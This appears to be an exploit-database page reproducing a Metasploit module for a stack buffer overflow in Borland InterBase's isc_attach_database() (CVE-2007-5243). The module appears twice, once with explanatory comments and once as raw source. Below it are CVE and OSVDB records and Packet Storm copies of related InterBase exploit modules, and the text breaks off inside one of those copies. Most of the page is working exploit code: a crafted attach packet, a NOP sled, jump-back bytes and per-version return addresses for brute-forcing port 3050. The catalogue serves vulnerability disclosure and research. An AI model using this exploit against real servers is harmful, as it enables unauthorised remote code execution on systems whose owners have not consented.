ID MSF:EXPLOIT/WINDOWS/MISC/IB_ISC_ATTACH_DATABASE
Type metasploit
Reporter Rapid7
Modified 1976-01-01T00:00:00
Description
This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted attach request.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit exploit module for the Borland InterBase isc_attach_database()
# stack buffer overflow (CVE-2007-5243; see 'References' below).
#
# Mixes in Tcp for the raw socket and BruteTargets, which (in the framework)
# drives #exploit_target for the selected target(s); the 'Brute Force' entry
# at index 0 is the default and makes the mixin walk every concrete target.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::BruteTargets

  # Registers module metadata (name, authors, references, payload constraints,
  # per-version targets) and the RPORT datastore option.
  #
  # @param info [Hash] caller-supplied module info, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Borland InterBase isc_attach_database() Buffer Overflow',
      'Description' => %q{
        This module exploits a stack buffer overflow in Borland InterBase
        by sending a specially crafted attach request.
      },
      'Author' =>
        [
          'Ramon de C Valle',
          'Adriano Lima <adriano[at]risesecurity.org>',
        ],
      'Arch' => ARCH_X86,
      'Platform' => 'win',
      'References' =>
        [
          [ 'CVE', '2007-5243' ],
          [ 'OSVDB', '38607' ],
          [ 'BID', '25917' ],
          [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],
        ],
      'Privileged' => true,
      'License' => MSF_LICENSE,
      # Constraints handed to the payload encoder: maximum encoded size,
      # byte values the encoded payload must not contain, and the stack
      # adjustment prepended to the payload.
      'Payload' =>
        {
          'Space' => 512,
          'BadChars' => "\x00\x2f\x3a\x40\x5c",
          'StackAdjustment' => -3500,
        },
      # Each concrete target carries:
      #   'Length' - candidate request body lengths; #exploit_target tries
      #              them in order, one connection each
      #   'Ret'    - the 32-bit value #exploit_target writes as target.ret
      # The comment above each entry records the instruction sequence the
      # 'Ret' value points at in that build.
      'Targets' =>
        [
          [ 'Brute Force', { } ],
          # 0x00403d4b pop esi; pop ebp; ret
          [
            'Borland InterBase WI-V8.1.0.257',
            { 'Length' => [ 3136, 3140 ], 'Ret' => 0x00403d4b }
          ],
          # 0x00403d4d pop esi; pop ebp; ret
          [
            'Borland InterBase WI-V8.0.0.123',
            { 'Length' => [ 3136, 3140 ], 'Ret' => 0x00403d4d }
          ],
          # 0x00403a5d pop esi; pop ebp; ret
          [
            'Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80',
            { 'Length' => [ 3136, 3140 ], 'Ret' => 0x00403a5d }
          ],
          # 0x004038fd pop esi; pop ebp; ret
          [
            'Borland InterBase WI-V7.0.1.1',
            { 'Length' => [ 3136, 3140 ], 'Ret' => 0x004038fd }
          ],
          # 0x0040390d pop esi; pop ebp; ret
          [
            'Borland InterBase WI-V6.5.0.28',
            { 'Length' => [ 1328, 1332 ], 'Ret' => 0x0040390d }
          ],
          # 0x00403901 pop esi; pop ebp; ret
          [
            'Borland InterBase WI-V6.0.1.6',
            { 'Length' => [ 1328, 1332 ], 'Ret' => 0x00403901 }
          ],
          # 0x004038b1 pop esi; pop ebp; ret
          [
            'Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0',
            { 'Length' => [ 1328, 1332 ], 'Ret' => 0x004038b1 }
          ],
          # 0x00404a10 pop esi; pop ebp; ret
          [
            'Borland InterBase WI-V5.5.0.742',
            { 'Length' => [ 1428, 1432 ], 'Ret' => 0x00404a10 }
          ],
          # 0x00404a0e pop esi; pop ebp; ret
          [
            'Borland InterBase WI-V5.1.1.680',
            { 'Length' => [ 1332, 1336 ], 'Ret' => 0x00404a0e }
          ],
          # Debug: 'Ret' is a recognisable placeholder value rather than an
          # address taken from a real build, so a crash can be spotted in a
          # debugger by the value it faults on.
          [
            'Debug',
            { 'Length' => [ 1332 ], 'Ret' => 0xaabbccdd }
          ],
        ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Oct 03 2007'
    ))

    # 3050 is the default InterBase listener port.
    register_options(
      [
        Opt::RPORT(3050)
      ],
      self.class
    )
  end

  # Sends one attach request per candidate body length for the given target,
  # then hands off to the payload handler.
  #
  # Wire layout of each request as built below:
  #   u32be opcode (19) | u32be id (0) | u32be length | `length` body bytes |
  #   zero pad to a 4-byte boundary | u32be 1024 | 1024 random alpha bytes
  # The body is exactly `length` bytes: the nop block is sized as
  # length - payload - 13, and the five writes that follow the payload
  # total 13 bytes (5 + 2 + 2 + 4).
  #
  # @param target [Msf::Module::Target] a 'Targets' entry exposing ['Length'] and #ret
  # @return [void]
  def exploit_target(target)
    target['Length'].each do |length|
      connect
      # NOTE(review): connect is issued on every iteration but nothing in this
      # block disconnects between attempts; confirm whether the mixin tears the
      # socket down, or whether a disconnect belongs at the end of the loop.

      # Attach database
      op_attach = 19

      # Round the body up to a multiple of 4: padding is 0 when length is
      # already aligned, otherwise the bytes needed to reach the next multiple.
      remainder = length.remainder(4)
      padding = 0
      if remainder > 0
        padding = (4 - remainder)
      end

      # Mutable literal is required for << below (the file carries no
      # frozen_string_literal pragma).
      buf = ''
      # Operation/packet type (32-bit big-endian)
      buf << [op_attach].pack('N')
      # Id
      buf << [0].pack('N')
      # Length (of the body that follows, not of the whole packet)
      buf << [length].pack('N')
      # Nop block: 13 = the bytes appended after the payload (5 + 2 + 2 + 4)
      buf << make_nops(length - payload.encoded.length - 13)
      # Payload
      buf << payload.encoded
      # Jump back into the nop block (5 bytes: opcode + 32-bit little-endian rel32)
      buf << "\xe9" + [-1028].pack('V')
      # Jump back (2 bytes: opcode + signed 8-bit rel8)
      buf << "\xeb" + [-7].pack('c')
      # Random alpha data (2 bytes)
      buf << rand_text_alpha(2)
      # Target return address, 32-bit little-endian (4 bytes)
      buf << [target.ret].pack('V')
      # Padding
      buf << "\x00" * padding
      # Database parameter block
      # Length
      buf << [1024].pack('N')
      # Random alpha data
      buf << rand_text_alpha(1024)
      sock.put(buf)
      # Kernel#select with no IO sets and a 4 s timeout: a plain 4-second
      # pause before the handler runs.
      select(nil,nil,nil,4)
      handler
    end
  end
end
{"id": "MSF:EXPLOIT/WINDOWS/MISC/IB_ISC_ATTACH_DATABASE", "type": "metasploit", "bulletinFamily": "exploit", "title": "Borland InterBase isc_attach_database() Buffer Overflow", "description": "This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted attach request.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5243", "http://www.risesecurity.org/advisories/RISE-2007002.txt"], "cvelist": ["CVE-2007-5243"], "lastseen": "2020-10-06T04:59:12", "viewCount": 11, "enchantments": {"score": {"value": 8.3, "vector": "NONE", "modified": "2020-10-06T04:59:12", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-5243"]}, {"type": "exploitdb", "idList": ["EDB-ID:9954", "EDB-ID:10020", "EDB-ID:16844", "EDB-ID:16843", "EDB-ID:16420", "EDB-ID:16449", "EDB-ID:16432", "EDB-ID:16437", "EDB-ID:16839", "EDB-ID:16440"]}, {"type": "osvdb", "idList": ["OSVDB:38606", "OSVDB:38608", "OSVDB:38605", "OSVDB:38609", "OSVDB:38607"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83097", "PACKETSTORM:82244", "PACKETSTORM:83227", "PACKETSTORM:82246", "PACKETSTORM:83238", "PACKETSTORM:83201", "PACKETSTORM:83069", "PACKETSTORM:83151"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/MISC/IB_ISC_CREATE_DATABASE", "MSF:EXPLOIT/LINUX/MISC/IB_PWD_DB_ALIASED", "MSF:EXPLOIT/WINDOWS/MISC/FB_ISC_ATTACH_DATABASE", "MSF:EXPLOIT/WINDOWS/MISC/FB_ISC_CREATE_DATABASE", "MSF:EXPLOIT/LINUX/MISC/IB_JRD8_CREATE_DATABASE", "MSF:EXPLOIT/WINDOWS/MISC/IB_SVC_ATTACH", "MSF:EXPLOIT/LINUX/MISC/IB_INET_CONNECT", "MSF:EXPLOIT/WINDOWS/MISC/FB_SVC_ATTACH"]}], "modified": "2020-10-06T04:59:12", "rev": 2}, "vulnersScore": 8.3}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/ib_isc_attach_database.rb", 
"sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::BruteTargets\n\n def initialize(info = {})\n super(update_info(info,\n 'Name'\t\t=> 'Borland InterBase isc_attach_database() Buffer Overflow',\n 'Description'\t=> %q{\n This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted attach request.\n },\n 'Author'\t=>\n [\n 'Ramon de C Valle',\n 'Adriano Lima <adriano[at]risesecurity.org>',\n ],\n 'Arch'\t\t=> ARCH_X86,\n 'Platform'\t=> 'win',\n 'References'\t=>\n [\n [ 'CVE', '2007-5243' ],\n [ 'OSVDB', '38607' ],\n [ 'BID', '25917' ],\n [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\n ],\n 'Privileged'\t=> true,\n 'License'\t=> MSF_LICENSE,\n 'Payload'\t=>\n {\n 'Space' => 512,\n 'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\n 'StackAdjustment' => -3500,\n },\n 'Targets'\t=>\n [\n [ 'Brute Force', { } ],\n # 0x00403d4b pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V8.1.0.257',\n { 'Length' => [ 3136, 3140 ], 'Ret' => 0x00403d4b }\n ],\n # 0x00403d4d pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V8.0.0.123',\n { 'Length' => [ 3136, 3140 ], 'Ret' => 0x00403d4d }\n ],\n # 0x00403a5d pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80',\n { 'Length' => [ 3136, 3140 ], 'Ret' => 0x00403a5d }\n ],\n # 0x004038fd pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V7.0.1.1',\n { 'Length' => [ 3136, 3140 ], 'Ret' => 0x004038fd }\n ],\n # 0x0040390d pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V6.5.0.28',\n { 'Length' => [ 1328, 1332 ], 'Ret' => 0x0040390d }\n ],\n # 0x00403901 pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V6.0.1.6',\n { 'Length' => [ 1328, 1332 ], 'Ret' => 0x00403901 }\n ],\n # 0x004038b1 pop esi; pop ebp; ret\n [\n 
'Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0',\n { 'Length' => [ 1328, 1332 ], 'Ret' => 0x004038b1 }\n ],\n # 0x00404a10 pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V5.5.0.742',\n { 'Length' => [ 1428, 1432 ], 'Ret' => 0x00404a10 }\n ],\n # 0x00404a0e pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V5.1.1.680',\n { 'Length' => [ 1332, 1336 ], 'Ret' => 0x00404a0e }\n ],\n # Debug\n [\n 'Debug',\n { 'Length' => [ 1332 ], 'Ret' => 0xaabbccdd }\n ],\n ],\n 'DefaultTarget'\t=> 0,\n 'DisclosureDate' => 'Oct 03 2007'\n ))\n\n register_options(\n [\n Opt::RPORT(3050)\n ],\n self.class\n )\n\n end\n\n def exploit_target(target)\n\n target['Length'].each do |length|\n\n connect\n\n # Attach database\n op_attach = 19\n\n remainder = length.remainder(4)\n padding = 0\n\n if remainder > 0\n padding = (4 - remainder)\n end\n\n buf = ''\n\n # Operation/packet type\n buf << [op_attach].pack('N')\n\n # Id\n buf << [0].pack('N')\n\n # Length\n buf << [length].pack('N')\n\n # Nop block\n buf << make_nops(length - payload.encoded.length - 13)\n\n # Payload\n buf << payload.encoded\n\n # Jump back into the nop block\n buf << \"\\xe9\" + [-1028].pack('V')\n\n # Jump back\n buf << \"\\xeb\" + [-7].pack('c')\n\n # Random alpha data\n buf << rand_text_alpha(2)\n\n # Target\n buf << [target.ret].pack('V')\n\n # Padding\n buf << \"\\x00\" * padding\n\n # Database parameter block\n\n # Length\n buf << [1024].pack('N')\n\n # Random alpha data\n buf << rand_text_alpha(1024)\n\n sock.put(buf)\n\n select(nil,nil,nil,4)\n\n handler\n\n end\n\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}
{"cve": [{"lastseen": "2020-10-03T11:45:54", "description": "Multiple stack-based buffer overflows in Borland InterBase LI 8.0.0.53 through 8.1.0.253, and WI 5.1.1.680 through 8.1.0.257, allow remote attackers to execute arbitrary code via (1) a long service attach request on TCP port 3050 to the (a) SVC_attach or (b) INET_connect function, (2) a long create request on TCP port 3050 to the (c) isc_create_database or (d) jrd8_create_database function, (3) a long attach request on TCP port 3050 to the (e) isc_attach_database or (f) PWD_db_aliased function, or unspecified vectors involving the (4) jrd8_attach_database or (5) expand_filename2 function.\nMore information about this vulnerability can be found at: \r\nhttp://www.securitytracker.com/alerts/2007/Oct/1018772.html", "edition": 3, "cvss3": {}, "published": "2007-10-06T17:17:00", "title": "CVE-2007-5243", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-5243"], "modified": "2017-07-29T01:33:00", "cpe": ["cpe:/a:borland_software:interbase:li_8.0.0.253", "cpe:/a:borland_software:interbase:wi-o6.0.2.0", "cpe:/a:borland_software:interbase:wi_8.1.0.257", "cpe:/a:borland_software:interbase:wi-v7.5.0.129", "cpe:/a:borland_software:interbase:wi-v6.0.1.0", "cpe:/a:borland_software:interbase:li_8.0.0.54", "cpe:/a:borland_software:interbase:wi-v6.0.1.6", "cpe:/a:borland_software:interbase:wi-v8.0.0.123", "cpe:/a:borland_software:interbase:li_8.0.0.53", "cpe:/a:borland_software:interbase:wi_5.1.1.680", 
"cpe:/a:borland_software:interbase:wi-v5.1.1.680", "cpe:/a:borland_software:interbase:wi-v7.5.1.80", "cpe:/a:borland_software:interbase:wi-o6.0.1.6", "cpe:/a:borland_software:interbase:wi-v5.5.0.742", "cpe:/a:borland_software:interbase:wi-v6.0.0.627", "cpe:/a:borland_software:interbase:wi-v6.5.0.28", "cpe:/a:borland_software:interbase:wi-v7.0.1.1"], "id": "CVE-2007-5243", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5243", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:borland_software:interbase:wi-v6.0.0.627:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:wi-v6.5.0.28:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:wi-o6.0.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:wi_5.1.1.680:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:wi-v6.0.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:wi-v5.5.0.742:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:li_8.0.0.53:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:wi-v7.5.1.80:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:li_8.0.0.54:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:li_8.0.0.253:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:wi-v8.0.0.123:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:wi_8.1.0.257:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:wi-v7.0.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:wi-v6.0.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:wi-v5.1.1.680:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:wi-o6.0.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:borland_software:interbase:wi-v7.5.0.129:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "cvelist": ["CVE-2007-5243"], "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1018772\n[Secunia Advisory ID:27058](https://secuniaresearch.flexerasoftware.com/advisories/27058/)\n[Related OSVDB ID: 
38608](https://vulners.com/osvdb/OSVDB:38608)\n[Related OSVDB ID: 38605](https://vulners.com/osvdb/OSVDB:38605)\n[Related OSVDB ID: 38610](https://vulners.com/osvdb/OSVDB:38610)\n[Related OSVDB ID: 38607](https://vulners.com/osvdb/OSVDB:38607)\n[Related OSVDB ID: 38609](https://vulners.com/osvdb/OSVDB:38609)\nOther Advisory URL: http://risesecurity.org/blog/entry/3/\nOther Advisory URL: http://risesecurity.org/advisory/RISE-2007002/\nKeyword: TCP port 3050\nISS X-Force ID: 36956\nGeneric Exploit URL: http://risesecurity.org/exploit/14/\nFrSIRT Advisory: ADV-2007-3381\n[CVE-2007-5243](https://vulners.com/cve/CVE-2007-5243)\nBugtraq ID: 25917\n", "edition": 1, "modified": "2007-10-03T18:28:59", "published": "2007-10-03T18:28:59", "href": "https://vulners.com/osvdb/OSVDB:38606", "id": "OSVDB:38606", "title": "Borland InterBase Multiple Function create Request Remote Overflow", "type": "osvdb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "cvelist": ["CVE-2007-5243"], "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1018772\n[Secunia Advisory ID:27058](https://secuniaresearch.flexerasoftware.com/advisories/27058/)\n[Related OSVDB ID: 38605](https://vulners.com/osvdb/OSVDB:38605)\n[Related OSVDB ID: 38610](https://vulners.com/osvdb/OSVDB:38610)\n[Related OSVDB ID: 38606](https://vulners.com/osvdb/OSVDB:38606)\n[Related OSVDB ID: 38607](https://vulners.com/osvdb/OSVDB:38607)\n[Related OSVDB ID: 38609](https://vulners.com/osvdb/OSVDB:38609)\nOther Advisory URL: http://risesecurity.org/blog/entry/3/\nOther Advisory URL: http://risesecurity.org/advisory/RISE-2007002/\nKeyword: TCP port 3050\nISS X-Force ID: 36956\nGeneric Exploit URL: http://risesecurity.org/exploit/10/\nFrSIRT Advisory: ADV-2007-3381\n[CVE-2007-5243](https://vulners.com/cve/CVE-2007-5243)\nBugtraq ID: 25917\n", "edition": 1, "modified": 
"2007-10-03T18:28:59", "published": "2007-10-03T18:28:59", "href": "https://vulners.com/osvdb/OSVDB:38608", "id": "OSVDB:38608", "title": "Borland InterBase jrd8_attach_database Function Unspecified Remote Overflow", "type": "osvdb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "cvelist": ["CVE-2007-5243"], "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1018772\n[Secunia Advisory ID:27058](https://secuniaresearch.flexerasoftware.com/advisories/27058/)\n[Related OSVDB ID: 38608](https://vulners.com/osvdb/OSVDB:38608)\n[Related OSVDB ID: 38610](https://vulners.com/osvdb/OSVDB:38610)\n[Related OSVDB ID: 38606](https://vulners.com/osvdb/OSVDB:38606)\n[Related OSVDB ID: 38607](https://vulners.com/osvdb/OSVDB:38607)\n[Related OSVDB ID: 38609](https://vulners.com/osvdb/OSVDB:38609)\nOther Advisory URL: http://risesecurity.org/blog/entry/3/\nOther Advisory URL: http://risesecurity.org/advisory/RISE-2007002/\nKeyword: TCP port 3050\nISS X-Force ID: 36956\nGeneric Exploit URL: http://risesecurity.org/exploit/15/\nGeneric Exploit URL: http://risesecurity.org/exploit/9/\nFrSIRT Advisory: ADV-2007-3381\n[CVE-2007-5243](https://vulners.com/cve/CVE-2007-5243)\nBugtraq ID: 25917\n", "edition": 1, "modified": "2007-10-03T18:28:59", "published": "2007-10-03T18:28:59", "href": "https://vulners.com/osvdb/OSVDB:38605", "id": "OSVDB:38605", "title": "Borland InterBase Multiple Function service attach Request Remote Overflow", "type": "osvdb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "cvelist": ["CVE-2007-5243"], "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1018772\n[Secunia Advisory 
ID:27058](https://secuniaresearch.flexerasoftware.com/advisories/27058/)\n[Related OSVDB ID: 38608](https://vulners.com/osvdb/OSVDB:38608)\n[Related OSVDB ID: 38605](https://vulners.com/osvdb/OSVDB:38605)\n[Related OSVDB ID: 38610](https://vulners.com/osvdb/OSVDB:38610)\n[Related OSVDB ID: 38606](https://vulners.com/osvdb/OSVDB:38606)\n[Related OSVDB ID: 38607](https://vulners.com/osvdb/OSVDB:38607)\nOther Advisory URL: http://risesecurity.org/blog/entry/3/\nOther Advisory URL: http://risesecurity.org/advisory/RISE-2007002/\nKeyword: TCP port 3050\nISS X-Force ID: 36956\nFrSIRT Advisory: ADV-2007-3381\n[CVE-2007-5243](https://vulners.com/cve/CVE-2007-5243)\nBugtraq ID: 25917\n", "edition": 1, "modified": "2007-10-03T18:28:59", "published": "2007-10-03T18:28:59", "href": "https://vulners.com/osvdb/OSVDB:38609", "id": "OSVDB:38609", "title": "Borland InterBase expand_filename2 Function Unspecified Remote Overflow", "type": "osvdb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-04-28T13:20:34", "bulletinFamily": "software", "cvelist": ["CVE-2007-5243"], "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1018772\n[Secunia Advisory ID:27058](https://secuniaresearch.flexerasoftware.com/advisories/27058/)\n[Related OSVDB ID: 38608](https://vulners.com/osvdb/OSVDB:38608)\n[Related OSVDB ID: 38605](https://vulners.com/osvdb/OSVDB:38605)\n[Related OSVDB ID: 38610](https://vulners.com/osvdb/OSVDB:38610)\n[Related OSVDB ID: 38606](https://vulners.com/osvdb/OSVDB:38606)\n[Related OSVDB ID: 38609](https://vulners.com/osvdb/OSVDB:38609)\nOther Advisory URL: http://risesecurity.org/blog/entry/3/\nOther Advisory URL: http://risesecurity.org/advisory/RISE-2007002/\nKeyword: TCP port 3050\nISS X-Force ID: 36956\nGeneric Exploit URL: http://risesecurity.org/exploit/12/\nGeneric Exploit URL: http://risesecurity.org/exploit/13/\nFrSIRT Advisory: 
ADV-2007-3381\n[CVE-2007-5243](https://vulners.com/cve/CVE-2007-5243)\nBugtraq ID: 25917\n", "edition": 1, "modified": "2007-10-03T18:28:59", "published": "2007-10-03T18:28:59", "href": "https://vulners.com/osvdb/OSVDB:38607", "id": "OSVDB:38607", "title": "Borland InterBase Multiple Function attach Request Remote Overflow", "type": "osvdb", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:13:50", "description": "", "published": "2009-10-27T00:00:00", "type": "packetstorm", "title": "Borland InterBase jrd8_create_database() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2009-10-27T00:00:00", "id": "PACKETSTORM:82244", "href": "https://packetstormsecurity.com/files/82244/Borland-InterBase-jrd8_create_database-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Borland InterBase jrd8_create_database() Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Borland InterBase \nby sending a specially crafted create request. 
\n}, \n'Version' => '$Revision$', \n'Author' => \n[ \n'ramon', \n'Adriano Lima <adriano@risesecurity.org>', \n], \n'Arch' => ARCH_X86, \n'Platform' => 'linux', \n'References' => \n[ \n[ 'CVE', '2007-5243' ], \n[ 'OSVDB', '38606' ], \n[ 'BID', '25917' ], \n[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], \n], \n'Privileged' => true, \n'License' => MSF_LICENSE, \n'Payload' => \n{ \n'Space' => 128, \n'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\", \n}, \n'Targets' => \n[ \n# 0x0804cbe4 pop esi; pop ebp; ret \n[ \n'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253', \n{ 'Ret' => 0x0804cbe4 } \n], \n], \n'DefaultTarget' => 0 \n)) \n \nregister_options( \n[ \nOpt::RPORT(3050) \n], \nself.class \n) \n \nend \n \ndef exploit \n \nconnect \n \n# Create database \nop_create = 20 \n \nlength = 544 \nremainder = length.remainder(4) \npadding = 0 \n \nif remainder > 0 \npadding = (4 - remainder) \nend \n \nbuf = '' \n \n# Operation/packet type \nbuf << [op_create].pack('N') \n \n# Id \nbuf << [0].pack('N') \n \n# Length \nbuf << [length].pack('N') \n \n# It will return into this nop block \nbuf << make_nops(length - payload.encoded.length - 4) \n \n# Payload \nbuf << payload.encoded \n \n# Target \nbuf << [target.ret].pack('V') \n \n# Padding \nbuf << \"\\x00\" * padding \n \n# Database parameter block \n \n# Length \nbuf << [1024 * 32].pack('N') \n \n# Random alpha data \nbuf << rand_text_alpha(1024 * 32) \n \nsock.put(buf) \n \nhandler \n \nend \n \nend \n \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82244/ib_jrd8_create_database.rb.txt"}, {"lastseen": "2016-12-05T22:19:45", "description": "", "published": "2009-11-26T00:00:00", "type": "packetstorm", "title": "Borland InterBase isc_create_database() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2009-11-26T00:00:00", "id": 
"PACKETSTORM:83069", "href": "https://packetstormsecurity.com/files/83069/Borland-InterBase-isc_create_database-Buffer-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Tcp \ninclude Msf::Exploit::Remote::BruteTargets \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Borland InterBase isc_create_database() Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in Borland InterBase \nby sending a specially crafted create request. \n}, \n'Version' => '$Revision$', \n'Author' => \n[ \n'ramon', \n'Adriano Lima <adriano@risesecurity.org>', \n], \n'Arch' => ARCH_X86, \n'Platform' => 'win', \n'References' => \n[ \n[ 'CVE', '2007-5243' ], \n[ 'OSVDB', '38606' ], \n[ 'BID', '25917' ], \n[ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ], \n], \n'Privileged' => true, \n'License' => MSF_LICENSE, \n'Payload' => \n{ \n'Space' => 512, \n'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\", \n'StackAdjustment' => -3500, \n}, \n'Targets' => \n[ \n[ 'Brute Force', { } ], \n# 0x00403d4b pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V8.1.0.257', \n{ 'Length' => [ 2116, 2120 ], 'Ret' => 0x00403d4b } \n], \n# 0x00403d4d pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V8.0.0.123', \n{ 'Length' => [ 2116, 2120 ], 'Ret' => 0x00403d4d } \n], \n# 0x00403a5d pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80', \n{ 'Length' => [ 2116, 2120 ], 'Ret' => 0x00403a5d } \n], \n# 0x004038fd pop esi; pop ebp; ret \n[ \n'Borland InterBase WI-V7.0.1.1', \n{ 'Length' => [ 2116, 2120 ], 'Ret' => 0x004038fd } \n], \n# 0x0040390d pop esi; pop ebp; 
